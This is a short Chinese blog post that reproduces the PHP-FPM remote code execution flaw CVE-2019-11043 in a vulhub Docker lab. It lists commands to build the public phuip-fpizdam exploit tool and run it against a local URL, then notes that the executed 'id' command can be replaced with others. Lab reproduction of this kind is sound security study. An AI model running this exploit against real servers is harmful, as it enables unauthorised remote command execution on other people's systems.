PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现
环境搭建
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2019-11043
docker-compose up -d
访问
安装漏洞利用工具
git clone https://github.com/neex/phuip-fpizdam.git
cd phuip-fpizdam
go env -w GOPROXY=https://goproxy.cn
go get -v && go build
攻击
go run . "http://192.168.125.1:8080/index.php"
显示漏洞利用成功
浏览器进行访问,成功复现,id可替换为其他命令
报错及解决方法
报错原因:默认使用proxy.golang.org,国内无法访问
解决方法:更换为国内代理
执行命令
go env -w GOPROXY=https://goproxy.cn
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】凌霞软件回馈社区,博客园 & 1Panel & Halo 联合会员上线
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】博客园社区专享云产品让利特惠,阿里云新客6.5折上折
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· DeepSeek 解答了困扰我五年的技术问题。时代确实变了!
· PPT革命!DeepSeek+Kimi=N小时工作5分钟完成?
· What?废柴, 还在本地部署DeepSeek吗?Are you kidding?
· DeepSeek企业级部署实战指南:从服务器选型到Dify私有化落地
· 程序员转型AI:行业分析